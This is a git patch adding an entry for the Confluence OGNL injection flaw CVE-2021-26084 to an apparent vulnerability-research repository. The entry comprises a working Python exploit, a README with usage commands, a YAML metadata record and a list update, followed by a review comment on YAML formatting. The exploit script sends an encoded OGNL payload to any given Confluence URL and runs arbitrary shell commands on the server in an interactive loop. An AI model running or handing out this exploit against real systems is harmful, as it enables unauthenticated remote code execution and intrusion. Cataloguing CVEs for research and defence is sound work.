From 3e8f25e48f9b5f1c795b103d2f49f62cba0fca95 Mon Sep 17 00:00:00 2001
From: yangjipeng
Date: Thu, 20 Oct 2022 14:12:38 +0800
Subject: [PATCH 1/2] ADD CVE-2021-26084
---
 .../{ => 2019}/yaml/CVE-2019-3396.yaml | 0
 .../Confluence_OGNLInjection.py | 73 +++++++++++++++++++
 cve/confluence/2021/CVE-2021-26084/README.md | 35 +++++++++
 cve/confluence/2021/yaml/CVE-2021-26084.yaml | 50 +++++++++++++
 4 files changed, 158 insertions(+)
 rename cve/confluence/{ => 2019}/yaml/CVE-2019-3396.yaml (100%)
 create mode 100644 cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py
 create mode 100644 cve/confluence/2021/CVE-2021-26084/README.md
 create mode 100644 cve/confluence/2021/yaml/CVE-2021-26084.yaml
diff --git a/cve/confluence/yaml/CVE-2019-3396.yaml b/cve/confluence/2019/yaml/CVE-2019-3396.yaml
similarity index 100%
rename from cve/confluence/yaml/CVE-2019-3396.yaml
rename to cve/confluence/2019/yaml/CVE-2019-3396.yaml
diff --git a/cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py b/cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py
new file mode 100644
index 00000000..a105a62d
--- /dev/null
+++ b/cve/confluence/2021/CVE-2021-26084/Confluence_OGNLInjection.py
@@ -0,0 +1,73 @@
+#!/usr/bin/python3
+
+# Exploit Title: Confluence Server Webwork OGNL injection (PreAuth-RCE)
+# Google Dork: N/A
+# Date: 09/01/2021
+# Exploit Author: h3v0x
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: All < 7.12.x versions before 7.12.5
+# Tested on: Linux Distros
+# CVE : CVE-2021-26084
+
+# References:
+# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
+# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
+
+import requests
+import optparse
+from bs4 import BeautifulSoup
+import optparse
+from requests.packages import urllib3
+urllib3.disable_warnings()
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
+parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x", default="/pages/createpage-entervariables.action?SpaceKey=x")
+
+options, args = parser.parse_args()
+session = requests.Session()
+
+url_vuln = options.url
+endpoint = options.path
+
+
+if not options.url:
+
+ print('[+] Specify an url target')
+ print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
+ print('[+] Example help usage: exploit.py -h')
+ exit()
+
+
+def banner():
+
+ print('---------------------------------------------------------------')
+ print('[-] Confluence Server Webwork OGNL injection')
+ print('[-] CVE-2021-26084')
+ print('[-] https://github.com/h3v0x')
+ print('--------------------------------------------------------------- \n')
+
+
+def cmdExec():
+
+ while True:
+
+ cmd = input('> ')
+
+ xpl_url = url_vuln + endpoint
+ xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
+ "Connection": "close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ "Accept-Encoding": "gzip, deflate"}
+ xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
+ rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False)
+
+ soup = BeautifulSoup(rawHTML.text, 'html.parser')
+ queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
+ print(queryStringValue)
+
+
+banner()
+cmdExec()
+
diff --git a/cve/confluence/2021/CVE-2021-26084/README.md b/cve/confluence/2021/CVE-2021-26084/README.md
new file mode 100644
index 00000000..6623642a
--- /dev/null
+++ b/cve/confluence/2021/CVE-2021-26084/README.md
@@ -0,0 +1,35 @@
+# CVE-2021-26084 - Confluence Server Webwork OGNL injection
+
+- An OGNL injection vulnerability exists that would allow an authenticated user and in some instances unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
+
+
+### IMPORTANT
+This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I disapprove of illegal actions and take no responsibility for any malicious use of this script. The proof of concept demonstrated in this repository does not expose any hosts and was performed with permission.
+
+
+#### • queryString param Request
+![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/131630570-857df5dd-525d-43ec-9466-5c92ac9c1322.png)
+
+
+### Exploit Usage
+
+#### Commands:
+`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com `
+
+#### or
+`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x `
+
+
+
+#### • Exploitation with Confluence_OGNLInjection.py
+![Exploit](https://user-images.githubusercontent.com/6265911/131630805-147628fc-7772-47be-943e-12d24b052adb.png)
+
+
+
+- References:
+
+https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
+
+https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
+
+https://www.exploit-db.com/exploits/50243
diff --git a/cve/confluence/2021/yaml/CVE-2021-26084.yaml b/cve/confluence/2021/yaml/CVE-2021-26084.yaml
new file mode 100644
index 00000000..ae6294f5
--- /dev/null
+++ b/cve/confluence/2021/yaml/CVE-2021-26084.yaml
@@ -0,0 +1,50 @@
+id: CVE-2021-26084
+source: https://github.com/h3v0x/CVE-2021-26084_Confluence
+info:
+ name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。
+ severity: critical
+ description: |
+ 8月25日, Atlassian官方披露了一个关于Confluence 的一个高危漏洞, OGNI注入漏洞, 此漏洞允许经过身份验证或在某些情况下未授权的攻击者在Confluence Server或Data Center实例上执行任意代码。
+ scope-of-influence:
+ All 4.x.x versions
+ All 5.x.x versions
+ All 6.0.x versions
+ All 6.1.x versions
+ All 6.2.x versions
+ All 6.3.x versions
+ All 6.4.x versions
+ All 6.5.x versions
+ All 6.6.x versions
+ All 6.7.x versions
+ All 6.8.x versions
+ All 6.9.x versions
+ All 6.10.x versions
+ All 6.11.x versions
+ All 6.12.x versions
+ All 6.13.x versions before 6.13.23
+ All 6.14.x versions
+ All 6.15.x versions
+ All 7.0.x versions
+ All 7.1.x versions
+ All 7.2.x versions
+ All 7.3.x versions
+ All 7.4.x versions before 7.4.11
+ All 7.5.x versions
+ All 7.6.x versions
+ All 7.7.x versions
+ All 7.8.x versions
+ All 7.9.x versions
+ All 7.10.x versions
+ All 7.11.x versions before 7.11.6
+ All 7.12.x versions before 7.12.5
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26084
+ - https://jira.atlassian.com/browse/CONFSERVER-67940
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-26084
+ cwe-id: CWE-74
+ cnvd-id: None
+ kve-id: None
+ tags: RCE,cve2021,OGNI注入
\ No newline at end of file
-- 
Gitee
From 28f73442565fba14f636261fb7e9aa2a2d010fe3 Mon Sep 17 00:00:00 2001
From: yangjipeng
Date: Thu, 20 Oct 2022 14:14:26 +0800
Subject: [PATCH 2/2] ADD CVE-2021-26084
---
 vulnerability_list.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index f1290627..14afa0d8 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -17,5 +17,6 @@ cve:
 - CVE-2021-22205
 confluence:
 - CVE-2019-3396
+ - CVE-2021-26084
 cnvd:
 kve:
\ No newline at end of file
-- 
Gitee
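Review bot: `scope-of-influence:` is followed by indented plain lines with no block indicator, so a YAML parser folds the 31 version entries into one space-joined string, unlike the `description: |` key just above it; write it as `scope-of-influence: |` (or as a `-` list) so the individual version ranges survive parsing. "OGNI注入" in both `description` and `tags` looks like a typo for "OGNL注入", which is the name used in the README, the Python header and the CVE title. `cnvd-id: None` and `kve-id: None` parse as the literal string `None` rather than a null value; YAML's null is `null` or `~`, and the rest of the repository's records presumably expect one or the other. The `cwe-id: CWE-74` value is worth checking against the NVD entry linked under `reference`, which to my recollection files this CVE under the expression-language-injection CWE (CWE-917); this may follow a convention elsewhere in the repository that I cannot see. The file is also committed without a trailing newline.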